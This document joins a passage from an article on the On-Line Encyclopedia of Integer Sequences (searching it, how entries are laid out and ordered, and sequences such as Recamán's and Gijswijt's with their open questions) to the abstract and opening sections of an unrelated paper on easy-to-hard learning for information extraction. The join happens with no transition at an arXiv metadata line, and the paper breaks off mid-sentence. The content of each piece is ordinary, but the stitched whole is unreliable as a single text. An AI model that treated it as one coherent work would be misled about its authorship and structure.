Figures 3 and 4 show what happens if you submit \(1,2,5,14,42,132,429\), the first few Catalan numbers, one of the most famous sequences of all. I could have chosen a simpler example, like the Fibonacci numbers, but I have a particular reason for choosing the Catalan numbers. When the OEIS was new, people would sometimes say to me that they had a sequence they were trying to understand, and would I show them how to use the database. At least twice when I used the Catalan sequence as an illustration, they said, why, that is my sequence, how on earth did you know? It was no mind-reading trick: the Catalan numbers are certainly the most common sequence that people don't know about. This entry is the longest--and one of the most important--in the whole database.

Figure 3: The result of submitting \(1,2,5,14,42,132,429\) to the database. This figure shows the banner at the top of the reply. There are 26 matches, ranked in order of importance, the top match being the one we want, the Catalan numbers. A shortened version of the top match is shown in the next figure.

Figure 4: The entry for the Catalan numbers, A000108. The full entry has over 750 lines, which have been edited here to show samples of the different fields.

If we do not find your sequence in the database, we will send you a message inviting you to submit it (if you consider it to be of general interest), so that the next person who comes across it will be helped, and your name will go on record as the person who submitted it.

The second main use of the database is to find out the latest information about a particular sequence. Of course we cannot hope to keep all 360000 entries up-to-date. But when a new paper is published that mentions the OEIS, Google will tell us, and we then add links to that paper from any sequence that it mentions. People have told us that this is one of the main ways they use the OEIS. After all, even a specialist in (say) permutation groups cannot keep track of all the papers published worldwide in that area. And if a paper in a physics journal happens to mention a number-theoretic sequence, for example, that is unlikely to be noticed by mathematicians.

There are also many other ways in which the database has proved useful. For example, it is an excellent source of problems to work on. The database is constantly being updated. Every day we get thirty to fifty submissions of new sequences, and an equal number of comments on existing entries (new formulas, references, additional terms, etc.). The new sequences are often sent in by non-mathematicians, and are a great source of problems. You can see the current submissions at [https://oeis.org/draft](https://oeis.org/draft). Often enough you will see a sequence that is so interesting you want to drop everything and work on it. And remember that we are always in need of more volunteer editors. In fact anyone who has registered with the OEIS can suggest edits; you do not even need to be an official editor. We have been the source of many international collaborations. There is also an educational side: several people have told us that they were led into mathematics through working as an editor. Here is a typical story.

Subject: Reminiscence from a young mathematician

I wanted to relay a bit of nostalgia and my heartfelt thanks. Back in the late 1990s, I was a high school student in Oregon. While I was interested in mathematics, I had no significant mathematically creative outlet until I discovered the OEIS in the course of trying to invent some puzzles for myself.
I remember becoming a quite active contributor through the early 2000s, and eventually, at one point, an editor. My experience with the OEIS, and the eventual intervention of one of my high school teachers, catalyzed my interest in studying mathematics, which I eventually did at [...] College. I went on to a Ph.D. in algebraic geometry at the University of [...], and am currently at [...]. I wanted to thank you for seriously engaging with an 18-year-old kid, even though I likely submitted my fair share of mathematically immature sequences. I doubt I would have become a mathematician without the OEIS!

A less-obvious use of the database is to quickly tell you how hard a problem is. I use it myself in this way all the time. Is the sequence "Catalan" or "Collatz"? If a sequence comes up in your own work, or when reviewing someone else's work, it is useful to know right away if this is a well-understood sequence, like the Catalan numbers, or if it is one of the notoriously intractable problems like the Collatz or \(3x+1\) problem (A006577).

Finally, the OEIS is a welcome escape when you feel the world is falling apart. Take a look at Scott Shannon's drawings of stained glass windows in A331452; or Jonathan Wild's delicate illustrations of the ways to draw four circles in A250001; or Eric Angelini's "1995" puzzle (A131744) or any of his "lexicographically earliest sequences" (A121053, A307720, and many more); or find better solutions to the Stepping Stones Problem (§4.5, A337663). You can find brand new problems at any hour of the day or night by looking at the stack of recent submissions: but beware, you may see a problem there that will keep you awake for days. Or search in the database for phrases like "It appears that...", or "Conjecture:...", or "It would be nice to know more!"

### Layout of a typical entry

This is a good place to mention some of the features of an OEIS entry. Most of the fields (see Figs. 3 and 4) are self-explanatory. At the top it tells you how many matches were found to your query (26 in the example). These are ranked in order of importance. The DATA section shows the start of the sequence, usually enough terms to fill a few lines on the screen (typically 300 to 500 decimal digits). Often one wants more terms than are shown, and the first link in the entry will point to a plain text file with perhaps 10000 or 20000 terms. That file will have a name like b001006.txt, and is called the "b-file" for the sequence. Some entries also have much larger tables, giving a million or more terms. If you click the "graph" button near the top of the reply, you will be shown two plots of the sequence, and if you click the "listen" button, you can listen to the sequence played on an instrument of your choice. The default instrument is the grand piano, and the terms of the sequence are mapped to the 80 keys by reducing the numbers mod 80 and adding 1.

I conclude this section with a philosophical comment. When you are seriously trying to analyze a sequence, and are prepared to spend any amount of time needed (searching for a formula or recurrence, for instance), you need all the help you can get, which is why we provide the b-files and other data files, and why we give computer programs in so many languages. This is also the reason we give as many references and links as possible for a sequence.
Even if the reference is to an ancient or obscure journal, or one that has been accused as being "predatory", we still give the reference, especially for sequences that are not well-understood. The same thing holds for formulas, comments, and cross-references to other sequences. When you are desperate, you will accept help from anywhere. And do not forget "Superseeker"! ### Arrangement of the entries The entries in the database are (virtually) arranged in two different ways, the first essentially chronological, the second lexicographic. The first is by their _absolute_ identification number, or A-number.3 Once the collection reached a few hundred entries, I sorted them into lexicographic order and numbered them A1, A2, A3, \(\ldots\). A1 gives the number of symmetry groups of order \(n\), A2 is the famous Kolakoski sequence, and so on. This numbering is still used today, only A1 has become A000001, A2 is A000002,..., and as each new submission comes in it gets a number from the stack. Current sequences are being issued numbers around A360000. Rejected A-numbers are recycled, so there are no gaps in the order. We reached 100000 entries in 2004, and 250000 in 2015. The present growth rate is about 12000 new entries each year. The second arrangement is a kind of lexicographic ordering. First I describe an idealized, theoretical, lexicographic order. Sequences of nonnegative numbers can be arranged in lexicographic (or dictionary) order. For example, sequences beginning \(1,2,4,\ldots\) come before \(1,2,5,\ldots\), \(1,2,4,3,\ldots\), \(1,3,\ldots\), etc., but after \(1,2,3,\ldots\). Also \(1,2,4,\ldots\) comes after the two-term sequence \(1,2\) (because blanks precede numbers). More formally, we compare the two sequences term-by-term, and in the first position where they differ whichever is smaller (or blank) is the lexicographically earlier sequence. For sequences with negative terms, we ignore the signs and sort according to the absolute values. Here is the actual ordering used in the OEIS. The sequences are arranged (virtually) into a version of lexicographic order, according to the following rules. First, delete all minus signs. Then find the first term that is greater than \(1\), and discard all the terms before it. What's left determines its position in the lexicographic order. For example, to place \(-1,0,1,1,\underline{2},1,17,3,2,1,\ldots\) in the ordering, we would ignore the terms before the underlined \(2\), and consider the sequence as beginning \(2,1,17,3,2,1,\ldots\). Sequences that contain only \(0\)s, \(1\)s and \(-1\)s are sorted into lexicographic order by absolute value and appear at the beginning of the ordering. The first sequence in the database is therefore the zero sequence A000004. In this way every sequence has a unique position in the ordering. The sequences have been sorted in this way since the 1960s. For the first ten years the punched card entries were physically sorted into this order. When you look at an OEIS entry, A005132 say (the subject of Section 4.1), towards the bottom you will see two lines like4 Footnote 4: If you don’t see these, click on the A-number at the top of the entry. Sequence in context: A277558 A350578 A335299 * A064388 A064387 A064389 Adjacent sequences: A005129 A005130 A005131 * A005133 A005134 A005135 which tell you the three entries immediately before and after that entry in the lexicographic ordering, and the three entries before and after it in the A-numbering. The asterisks represent the sequence you are looking at. 
The first group can be useful if you are uncertain about a term in your sequence, the second in case you want to look at other sequences submitted around that time. Today the sequences are actually stored internally in an SQLite database. However, the punched card format has been so useful that when you view a sequence, as in Fig. 4, it is still presented to you in something very like the old punched card format. ### Summary: "A Handbook of Integer Sequences" today * Now _The On-Line Encyclopedia of Integer Sequences_ or _OEIS_: [https://oeis.org](https://oeis.org) * Accurate information about 360000 sequences. * Definition, formulas, references, links, programs. View as list, table, graph, music! * Traffic: 1 million hits/day. * 30 new entries, 50 updates every day. * Often called one of best math sites on the Web. Fingerprint file for mathematics. * Street creds: 10000 citations. * A moderated Wiki, owned by OEIS Foundation, a 501(c)(3) public charity. * Uses: to see if your sequence is new, to find references, formulas, programs. * Catalan or Collatz? (Very easy or very hard?) * Source of fascinating research problems;5 low-hanging fruit from recent submissions. Footnote 5: Look for “Conjecture”, “It appears that”, “It would be nice to”,... * Accessible (free, friendly). * Fun \((1,2,4,6,3,9,12,8,10,5,15,...?)\). Interesting, educational. Escape. * Addictive (better than video games). * Has led many people into mathematics. * One of the most successful international collaborations, a modest contribution towards world peace. * Need editors. ## 4 Some favorite sequences I'm sometimes asked what my favorite sequence is. This is a difficult question. I'm tempted to reply by saying: If you were the keeper of the only zoo in the world, how would you answer that question? (Because that is roughly the situation I'm in.) Would you pick one of the exotic animals, a giraffe, a kangaroo, or a blue whale? Or one of the essential animals, like a horse, a cow, or a duck? If the question came from a visiting alien, of course, there is only one possible answer: a human being. For sequences, the essential ones are the primes, the powers of 2, the Catalan numbers, or (especially if the question came from an alien with no fingers or toes), the counting sequence 0, 1, 2, 3, 4,... (A001477). But here I'll mention a few that are fairly exotic. The Recaman and Gijswijt sequences have simple recursive definitions, yet are astonishingly hard to understand. ### Recaman's sequence (A005132) This remarkable sequence has resisted analysis for over 30 years, even though we have computed an astronomical number of terms. It was contributed to the database by Bernardo Recaman Santos in 1991. The definition is deceptively simple. The first term is 0. We now add or subtract 1, then we add or subtract 2, then add or subtract 3, and so on. The rule is that we always first try to subtract, but we can only subtract if that leaves a nonnegative number that is not yet in the sequence. Otherwise we must add. Here is how the sequence starts. We have the initial 0. We can't subtract 1, because that would give a negative number, so we add 1 to 0. So the second term is 1. We can't subtract 2 from 1, so we add it, getting the third term \(1+2=3\). Again we can't subtract 3, for that would give 0, which has already appeared, so we add 3, getting the fourth term \(3+3=6\). Now we must add or subtract 4, and this time we can subtract, because \(6-4=2\), and 2 is nonnegative and a number that hasn't yet appeared. 
So at this point the sequence is \(0,1,3,6,2\). Then it continues \(7(=2+5)\), \(13(=7+6)\), \(20(=13+7)\), \(12(=20-8)\), and so on. The first 16 terms are \[0,1,3,6,2,7,13,20,12,21,11,22,10,23,9,24,\ldots\] When adding rather than subtracting, repeated terms are permitted (42 is repeated at the 24th term).

Edmund Harriss has found an elegant way to draw the sequence as a spiral on the number line. Start at 0, and when we subtract \(n\), draw a semicircle of diameter \(n\) to the left from the last point, or to the right if we are adding \(n\). Draw the semicircles alternately below and above the horizontal axis so as to produce a smooth spiral.

Figure 5: Harriss’s drawing of the first 64 terms of Recamán’s sequence. (The tiny initial semicircle, at the extreme left, is below the axis. It has diameter 1 and joins the points 0 and 1. It continues as a semicircle of diameter 2, above the axis, joining the points 1 and 3.)

The main question about this sequence is: Does every positive number appear? What makes this sequence so interesting is that certain numbers (for reasons we do not understand) are extremely reluctant to appear. 4 does not appear until 131 steps, and 19 takes 99734 steps. A group of us at AT&T Bell Labs worked on this sequence in 2001, and developed a way to greatly speed up the computation. Allan Wilks used it to compute the first \(10^{15}\) terms, and found that 2406 (which had been missing for a long time) finally appeared at step 394178473633984. At this point the smallest missing number was \(852655=5\cdot 31\cdot 5501\). Benjamin Chaffin has continued this work, and in 2018 reached \(10^{230}\) terms. However, 852655 was still missing, and there has been no progress since then.

Thirty years ago I thought that every number would eventually appear. Now I am not so sure. My current belief is that there are two possibilities. Either there are infinitely many numbers that never appear, and 852655 just happens to be the smallest of them, with no other special property (a similar phenomenon seems to occur when iterating various number-theoretic functions--see the next section). Or every number will eventually appear (just as presumably every one of Shakespeare's plays will eventually appear in the expansion of \(\pi\) in base 60), although we may never be able to extend the sequence far enough to hit 852655. For the latest information about this sequence (or any other sequence mentioned in this article), consult the OEIS.

Open question: Does 852655 appear in A005132?

### Iteration of number-theoretic functions

Many mysterious sequences arise from the iteration of number-theoretic functions. A classic problem concerns the iteration of the function \(f(n)=\sigma(n)-n\), the sum of the "aliquot parts" of \(n\) (see Guy [10, §B6], A001065). For an initial value of \(n\), what happens to the trajectory \(n,f(n),f(f(n)),\ldots\)? All \(n<276\) terminate by entering a cycle (such \(n\) are called "perfect", "amicable", or "sociable" numbers), or reaching a prime, then 1, then 0. But it appears likely that \(n=276\), and perhaps all sufficiently large even numbers, will never terminate [6]. The trajectory of 276 is sequence A008892. At the time of writing, the trajectory has been computed for 2145 terms, and is still growing, term 2145 being a 214-digit number [8]. A098007 gives the number of distinct terms in the trajectory of \(n\), or \(-1\) if the trajectory is unbounded. The value of A098007(276) is unknown.
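As a small illustration, here is a sketch that reproduces the first few terms of the trajectory of 276 by plain trial division; the published computations of course depend on heavy-duty integer factorization, and the helper name below is merely illustrative.

```python
# Iterate f(n) = sigma(n) - n and print the start of the trajectory of 276 (A008892).
def sigma(n):
    """Sum of the divisors of n (A000203), by trial division."""
    total, d = 0, 1
    while d * d <= n:
        if n % d == 0:
            total += d
            if d != n // d:
                total += n // d
        d += 1
    return total

n = 276
for _ in range(8):
    print(n, end=" ")   # 276 396 696 1104 1872 3770 3790 3050 ...
    n = sigma(n) - n
```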
If indeed 276 does go to infinity, it is natural to ask, how did 276 know it was destined to be the first immortal number under the map \(f\)? The answer may be that there are infinitely many immortal numbers, and 276 just happens to be the first. It got lucky, that's all! Just as 852655 got lucky in Recamán's problem.

A similar question, also discussed by Guy [10, §B41], which has received much less attention, concerns the map \(g(n)=(\sigma(n)+\phi(n))/2\), where \(\phi(n)\) is the Euler totient function A000010. The trajectory may end at 1, a prime, or a fraction, or it may increase monotonically to infinity. Sequence A292108 gives the number of steps in the trajectory, or \(-1\) if the trajectory is infinite. All numbers \(n<270\) have finite trajectories, but it appears that 270 increases forever. The trajectory of 270 is A291789. Andrew Booker has given a heuristic argument showing that almost all numbers go to infinity. What makes 270 the first immortal number under \(g\)? Again I suspect it just got lucky!

Open questions: Does the trajectory of 276 under \(f\) increase forever? What about the trajectory of 270 under \(g\)?

### Gijswijt's sequence (A090822)

For this sequence it will be helpful to remember that chemists do not write \(H-H-O\), they write \(H_{2}O\); they do not write \(Al-Al-O-O-O\), they write \(Al_{2}O_{3}\). In the same spirit, the _curling number_ of a finite sequence \(S\) is the largest \(k\) such that \(S\) can be written as \(S=XYY\cdots Y\), with the block \(Y\) repeated \(k\) times at the end (\(X\) may be empty, \(Y\) may not). Gijswijt's sequence starts with \(a(1)=1\), and each subsequent term is the curling number of the terms so far. Starting from 1: the curling number of 1 is 1, so the second term is 1; the curling number of 1 1 is 2, so the third term is 2; then 1 1 2 and 1 1 2 1 each have curling number 1, giving two more 1's; 1 1 2 1 1 has curling number 2, as do 1 1 2 1 1 2 (we took Y = 1 1 2) and 1 1 2 1 1 2 2, giving three 2's; and 1 1 2 1 1 2 2 2 ends with three copies of 2, so its curling number is 3, and we have found the first 3, at the 9th term.

After a while, a 4 appears at term 220. But Gijswijt was unable to find a 5, and left that question open when he submitted the sequence. Some Bell Labs colleagues computed many millions of terms, but no 5 appeared. Finally, over the course of a long weekend, Fokko van der Bult (a fellow student of Gijswijt's in Amsterdam) and I independently showed that there is a 5. In fact there are infinitely many 5's, but the first one does not appear until about term \(10^{10^{23}}\). The universe would be cold long before any computer search would find it. In the paper we wrote about the sequence [4], we also conjectured that the first time a number \(N>4\) appears is at about term \[2\uparrow(2\uparrow(3\uparrow(4\uparrow(5\uparrow\ldots\uparrow(N-1))))),\] where the up-arrows (\(\uparrow\)) indicate exponentiation. This is a tower of exponents of height \(N-1\). A very recent manuscript by a student of Gijswijt's, Levi van de Pol [14], still under review, has extended our work, and may have proved the above conjecture.

I cannot resist adding a further comment about curling numbers: there is a conjecture which, if true, shows that the Gijswijt sequence is in a sense universal. The Curling Number Conjecture asserts that if any finite starting sequence is extended by the rule that the next term is the curling number of the sequence so far, then eventually the curling number will be 1. If true, this implies that if the starting sequence contains no 1s, then the sequence eventually becomes Gijswijt's sequence [5, Th. 23]. In fact I conjecture that this is true for any starting sequence.

Open question: Is the Curling Number Conjecture true?

### Lexicographically Earliest Sequences

Although there is no space to discuss them in detail, let me just mention that there are many fascinating and difficult sequences in the OEIS whose definition has the form "Lexicographically Earliest Sequence of distinct positive numbers with the property that...", where now we are using lexicographic in its pure sense, as defined in Section 3.4.
A favorite example is the EKG (or ECG) sequence A064413, whose definition is the lexicographically earliest infinite sequence of distinct positive numbers with the property that each term after the first has a nontrivial common factor with the previous term [11]. Other L.E.S. examples are the Yellowstone permutation A098550 [2], the Enots Wolley sequence A336957 (the name suggests the definition), and the Binary Two-Up sequence A354169 [7].

Open question: Show that the terms of the Enots Wolley sequence are precisely 1, 2, and all numbers with at least two distinct prime factors.

### The Stepping Stones Problem (A337663)

This lovely problem was invented in 2020 by two undergraduates, Thomas Ladouceur and Jeremy Rebenstock. You have an infinite chessboard, and a handful of brown stones, which are worth one point each. You also have an infinite number of white stones, of values 2, 3, 4, \(\ldots\), one of each value. Suppose you have \(n\) brown stones. You start by placing them anywhere on the board. Now you place the white stones, trying to place as many as you can. The rules are that you can only place a white stone labeled \(k\) on a square if the values of the stones on the eight squares around it add up to \(k\). And you must place the white stones in order, first 2, then 3, and so on. You stop when you cannot place the next higher-numbered white stone. The goal is to maximize the highest value that you place. Call this \(a(n)\).

Say we start with \(n=2\) brown stones. There are infinitely many squares where they can be placed, but it turns out that the best thing is to place them so they are separated diagonally by a single blank square, as in Fig. 6. Now we start trying to place the white stones. The 2 stone has to go between the two brown (or 1) stones, and then the 3 goes on a square adjacent to the 1 and the 2. There is now a choice for where the 4 goes, but the choice shown in Fig. 6 is the best. (After we have placed the 4, the neighbors of the 3 no longer add up to 3, but that is OK. It is only when we _place_ the 3 that its neighbors must add to 3.) Continuing in this way, we eventually reach 16. There is nowhere to place the 17, so we stop. Ladouceur and Rebenstock showed, using a computer and considering all possible arrangements, that \(16\) is the highest value that can be attained with two starting stones. So \(a(2)=16\).

Figure 6: A solution to the Stepping Stones problem for two starting stones. The high point \(a(2)=16\) here is indicated by an asterisk, as it is in the next three tables.

This is clearly a hard problem, since the number of possibilities grows rapidly with the number of brown stones. Only six terms of this sequence are known: \(a(1)\) through \(a(6)\) are \(1,16,28,38,49,60\). A solution for \(n=4\) found by Arnauld Chevallier is shown in Fig. 7. There are lower bounds for larger values of \(n\) which may turn out to be optimal. For \(n=7,\ldots,10\) the current best constructions give \(71,80,90,99\). See A337663 for the latest information.

We don't know how fast \(a(n)\) grows. There has been a series of upper and lower bounds, initiated by Robert Gerbicz and Andrew Howroyd. The simple linear construction shown in Fig. 8 shows that \(a(n)\geq 6(n-1)\) for \(n\geq 3\). By combining the constructions of Figs. 6 and 8, Menno Verhoeven obtained \(a(n)\geq 6n+3\) for \(n\geq 3\) (Fig. 9).
The best lower bound for large \(n\) is due to Robert Gerbicz, who has shown by a remarkable extension of the construction in Figs. 8 and 9 that \(\varliminf_{n\to\infty}a(n)/n>6\). (A preliminary version of his bound gives \(a(n)>6.0128\,n-5621\) for all \(n\), although the exact values of the constants have not been confirmed.) In his construction the "chimney" on the right of Fig. 9 gets expanded into a whole trellis. One might think that with a sufficiently clever arrangement, perhaps extending the construction in Fig. 8 so that the path wraps around itself in a spiral, one could achieve large numbers with only a few starting stones. But a simple counting argument due to Robert Gerbicz shows this is impossible. The current best upper bound is due to Jonathan F. Waldmann, who has shown that \(a(n)<79n+C\) for some constant \(C\). See A337663 for the latest information, including proofs of the results mentioned here.

Figure 7: A solution to the Stepping Stones problem for four starting stones.

Figure 8: Every additional \(1\) on the middle row increases the number of white stones by \(6\), showing that \(a(n)\geq 6(n-1)\) for \(n\geq 3\).

Figure 9: Combining the constructions of Figs. 6 and 8 gives \(a(n)\geq 6n+3\) for \(n\geq 3\). The case \(n=5\) is shown. For other values of \(n\), adjust the height of the “chimney” on the right.

Open question: Improve the lower and upper bounds on \(a(n)\). The lower bound looks especially weak.

### Stained glass windows

In 1998 Poonen and Rubinstein [15] famously determined the numbers of vertices and cells in the planar graph formed from a regular \(n\)-gon by joining every pair of vertices by a chord. The answers are in A006561 and A007678. Lars Blomberg, Scott Shannon, and I have studied versions of this question when the regular \(n\)-gon is replaced by other polygons, for instance by a square in which \(n\) equally-spaced points are placed along each side and each pair of boundary points is joined by a chord. We also studied rectangles, triangles, etc. In most cases we were unable to find formulas for the numbers of vertices or cells, but we collected a lot of data, and the graphs, when colored, often resemble stained glass windows (see [3] and the illustrations in A331452 and other sequences cross-referenced there).6 So we consoled ourselves with the motto: if we can't solve it, make art!

Footnote 6: There is no fee for downloading images from the OEIS, but if you use any of them, please credit the source!

The most promising case to analyze seemed to be the \(n\times 2\) grid (although we did not succeed even there).

Open question: How many vertices and cells are there in the graph for the \(n\times 2\) grid, as illustrated for \(n=4\) in Fig. 10? Sequences A331763 and A331766 give the first 100 terms, yet even with all that data we have not found a formula.

Figure 10: A \(4\times 2\) grid of squares with every pair of boundary points joined by a chord. The graph has 213 vertices and 296 cells. The cells are color-coded to distinguish triangles (red), quadrilaterals (yellow), and pentagons (blue). A334699 enumerates the cells by number of sides.

The case of an \(n\times n\) grid seems even harder. Figure 11 shows the \(6\times 6\) graph. Sequences A331449 and A255011 give the numbers of vertices and cells for \(n\leq 42\).

Figure 11: A \(6\times 6\) grid with every pair of boundary points joined by a chord. There are 4825 vertices and 6264 cells.

In the summer of 2022 Scott Shannon and I considered several other families of planar graphs. I cannot resist showing one of Shannon's graphs, a \(16\times 16\) grid, illustrating the 16th term of A355798 (Fig. 12). There are 61408 cells. Although Shannon has calculated 40 terms of this sequence, again no formula is known.

Figure 12: Scott Shannon’s “Magic Carpet” graph, illustrating A355798(16).
### Other sequences I would have liked to include

If I had had more space I would also have discussed some very interesting sequences arising from:

- Dissecting a square to get a regular \(n\)-gon (A110312).
- Gerrymandering (A341578, A348453, and many others).
- In how many ways can circles overlap? (A250001).
- The Inventory sequence A342585.
- Kaprekar's junction numbers (A006064, [1]).
- The kissing number problem (A001116, A257479).
- The neural network problem that started it all (A000435).
- Squares in the plane (A051602).

And (maybe!) meta-sequences such as A051070 (\(a(n)\) is the \(n\)th term of \(A_{n}\)) and A107357 (the \(n\)th term is 1 + the \(n\)th term of \(A_{n}\)).

A final comment: there are many videos on the Internet of talks I have given about sequences. There are over twenty videos that Brady Haran and I have made that have appeared on the YouTube Numberphile channel (and have been viewed over eight million times). See for example "Terrific Toothpick Patterns".

Acknowledgments. I would like to thank some good friends who have helped me and the OEIS over the years: David L. Applegate, William Cheswick, Russ Cox, Susanna S. Cuyler, Harvey P. Dale, Ronald L. Graham, Richard K. Guy, Marc LeBrun, John Riordan, and Doron Zeilberger. There are many active volunteer editors, and it is impossible to thank them all. But I would like to give particular thanks to Jörg Arndt, Michael S. Branicky, Michael De Vlieger, Amiram Eldar, Charles R. Greathouse IV, Maximilian F. Hasler, Alois P. Heinz, Andrew Howroyd, Sean A. Irvine, Antti Karttunen, Michel Marcus, Richard J. Mathar, Peter Munn, Hugo Pfoertner, Kevin Ryde, Jon E. Schoenfield, Rémy Sigrist, and Chai Wah Wu. I also thank the members of the Board of Trustees of the OEIS Foundation, past and present, for all their help, both to me personally and to the OEIS.

Figure credits: Figure 1(c): Clifford A. Pickover. Figure 5: Edmund Harriss. Figures 6, 7, 8, and 9 are based on communications from Thomas Ladouceur and Jeremy Rebenstock, Arnauld Chevallier, Skylark Xentha Murphy-Davies, and Menno Verhoeven, respectively. Figures 10 and 11: Lars Blomberg and Scott R. Shannon. Figure 12: Scott R. Shannon. Other figures: the author.
2305.09193
Easy-to-Hard Learning for Information Extraction
Information extraction (IE) systems aim to automatically extract structured information, such as named entities, relations between entities, and events, from unstructured texts. While most existing work addresses a particular IE task, universally modeling various IE tasks with one model has achieved great success recently. Despite their success, they employ a one-stage learning strategy, i.e., directly learning to extract the target structure given the input text, which contradicts the human learning process. In this paper, we propose a unified easy-to-hard learning framework consisting of three stages, i.e., the easy stage, the hard stage, and the main stage, for IE by mimicking the human learning process. By breaking down the learning process into multiple stages, our framework facilitates the model to acquire general IE task knowledge and improve its generalization ability. Extensive experiments across four IE tasks demonstrate the effectiveness of our framework. We achieve new state-of-the-art results on 13 out of 17 datasets. Our code is available at \url{https://github.com/DAMO-NLP-SG/IE-E2H}.
Chang Gao, Wenxuan Zhang, Wai Lam, Lidong Bing
2023-05-16T06:04:14Z
http://arxiv.org/abs/2305.09193v2
# Easy-to-Hard Learning for Information Extraction+ ###### Abstract Information extraction (IE) systems aim to automatically extract structured information, such as named entities, relations between entities, and events, from unstructured texts. While most existing work addresses a particular IE task, universally modeling various IE tasks with one model has achieved great success recently. Despite their success, they employ a one-stage learning strategy, i.e., directly learning to extract the target structure given the input text, which contradicts the human learning process. In this paper, we propose a unified easy-to-hard learning framework consisting of three stages, i.e., the easy stage, the hard stage, and the main stage, for IE by mimicking the human learning process. By breaking down the learning process into multiple stages, our framework facilitates the model to acquire general IE task knowledge and improve its generalization ability. Extensive experiments across four IE tasks demonstrate the effectiveness of our framework. We achieve new state-of-the-art results on 13 out of 17 datasets. Our code is available at [https://github.com/DAMO-NLP-SG/IE-E2H](https://github.com/DAMO-NLP-SG/IE-E2H). ## 1 Introduction Information extraction (IE) is a crucial task in natural language processing (NLP) that involves extracting structured knowledge from unstructured text data Bing et al. (2013, 2015), enabling various applications such as information retrieval Ruambo and Nicholas (2019), knowledge graph construction Oramas et al. (2016); Wang et al. (2019), and question answering Khot et al. (2017). Depending on what kind of information is to be extracted, IE consists of a wide range of tasks, including named entity recognition (NER) Li et al. (2022), joint entity and relation extraction (RE) Taille et al. (2020); Chia et al. (2022), event extraction (EE) Li et al. (2022), and aspect-based sentiment analysis (ABSA) Zhang et al. (2022). Traditionally, IE has been approached with specialized models that are designed to handle specific IE tasks. For example, NER is often formulated as a sequence labeling Ma and Hovy (2016); Xu et al. (2021) or span-based classification Wang et al. (2020) problem. The more complex RE or EE task is usually solved with pipeline approaches that split the original task into several sequential subtasks and design specific models for each subtask Subburathinam et al. (2019); Yang et al. (2019); Peng et al. (2020). These models often require extensive task-specific knowledge to design dedicated model architectures and thus suffer from poor generalization. Recently, motivated by pre-trained generative models such as T5 Raffel et al. (2020) that handle multiple tasks with the unified text-to-text format, there has been a shift towards the use of unified models for IE as well, which can tackle all IE tasks with a single model structure. For example, TANL Paolini et al. (2021) tackles various IE tasks with a text-to-text generative model by framing them as translation between augmented natural languages. UIE Lu et al. (2022) models heterogeneous IE structures into a uniform representation via a structural extraction language. Despite the success of existing unified models on various IE tasks, they typically adopt a one-stage learning paradigm, i.e., directly learning to predict the target structure given the input text. In contrast, humans often learn to tackle a task in an easy-to-hard manner. 
They learn basic concepts or skills before solving more complex problems and often tackle harder examples to gain a better understanding of the problem. Taking the RE task as an example, it aims to extract relational triplets, where each triplet consists of a head entity, a relation, and a tail entity. To tackle it, humans first learn some basic skills, such as identifying entities, recognizing relations, and associating entities and relations, before extracting complex relational triplets. This process facilitates humans to learn meaningful substructures and the dependencies among them. Moreover, in practical scenarios, humans usually encounter harder cases, i.e., long input context of multiple sentences containing more entities and relations. By solving hard cases, humans improve their understanding of the task and problem-solving skills. By comparison, models are only trained with the provided training data. The gap between the model and human learning strategies hinders IE models from further development. To bridge the gap, we propose an **easy-to-hard (E2H)** learning framework for IE tasks in this paper. E2H mimics the human learning procedure to learn each IE task in stages, i.e., the easy stage, the hard stage, and the main stage. The easy stage aims to help the model acquire basic skills of the task, and the hard stage aims to assist the model in handling broad-range variations of the task via training the model with diverse and harder data. Finally, the main stage focuses on the main task at hand for training. Thus an immediate question is how to prepare the data with different levels of difficulty for the easy and hard stages. It is labor-intensive and challenging to construct such data manually. In this work, we attempt only to leverage the existing data of the main task for constructing the data. Specifically, for the easy stage, we observe that the target IE structure often has meaningful substructures. Therefore, we identify several basic skills for each task according to the substructures of its target structure. Returning to the RE example, the skills can be recognizing the entities, relations, and dependencies between them. We can automatically construct training data for learning these skills by modifying the input prompt and decomposing the target structure of the main task. For the hard stage, we combine two training instances of the main task to build a harder training instance by concatenating their input texts to form the new text and their targets to build the new target. The new instance contains more entities, relations, and complicated contexts, making it harder than the original instances. Through these two novel construction strategies, we can reduce much human effort to obtain the data for different stages. To summarize, our contributions are three-fold: (1) We propose a unified easy-to-hard (E2H) learning framework for IE tasks by imitating the human learning process; (2) We develop two novel strategies to build the easy and hard stages of our framework without using any additional resources; (3) We conduct comprehensive evaluations on 17 datasets across four IE tasks and achieve state-of-the-art results on 13 datasets. Notably, our E2H method consistently outperforms the one-stage learning counterpart by introducing two extra learning stages with an average increase of 0.38, 2.96, 1.33, and 1.39 absolute points on the NER, RE, EE, and ABSA tasks, respectively. ## 2 Task Definition This paper investigates four common IE tasks, i.e., NER, RE, EE, and ABSA. 
In this section, we provide formal definitions of these tasks. Detailed examples of these tasks are in Appendix A.3. Named Entity Recognition (NER)Given an input text \(T\), the task is to identify and classify entities in \(T\) into predefined categories, i.e., extract \(\{(e_{i},c_{i})\}\), where \(e_{i}\) is the \(i\)-th entity, which is a continuous text span in \(T\), \(c_{i}\in\mathcal{C}\) is its category, and \(\mathcal{C}\) is the entity category set. Relation Extraction (RE)Given an input text \(T\), RE is to identify a set of (head entity, relation, tail entity) triplets, i.e., extract \(\{((e_{i}^{h},c_{i}^{h}),r_{i},(e_{i}^{t},c_{i}^{t}))\}\), where the superscripts \(h\) and \(t\) denote the head and tail entities, \(r_{i}\in\mathcal{R}\) is the \(i\)-th relation, and \(\mathcal{R}\) is the relation set. Event Extraction (EE)Given an input text \(T\), the task is to identify a set of events where each event consists of an event trigger and a set of corresponding arguments, i.e., extract \(\{((e_{i}^{tri},c_{i}^{tri}),(e_{i}^{arg_{1}},c_{i}^{arg_{1}}),\cdots,(e_{i}^{ arg_{m}},c_{i}^{arg_{m}}))\}\), where \(e_{i}^{tri}\) is the \(i\)-th trigger, which is a continuous text span in \(T\), \(c_{i}^{tri}\in\mathcal{C}_{event}\) is its category, \(e_{i}^{arg_{j}}\) is the \(j\)-th argument of the \(i\)-th event, which is also a continuous text span in \(T\), \(c_{i}^{arg_{j}}\in\mathcal{C}_{event}\) is its category, and \(\mathcal{C}_{event}\) consists of all event and argument categories. Aspect-based Sentiment Analysis (ABSA)There are four essential elements in ABSA, namely aspect category \(c\), aspect term \(a\), opinion term \(o\), and sentiment polarity \(p\). We focus on the aspect sentiment triplet extraction (ASTE) task Peng et al. (2020) and the aspect sentiment quad prediction (ASQP) task Zhang et al. (2021) given their popularity. Given an input text \(T\), the ASTE task is to identify a set of \(\{(a_{i},o_{i},p_{i})\}\) triplets, and the ASQP task is to identify a set of 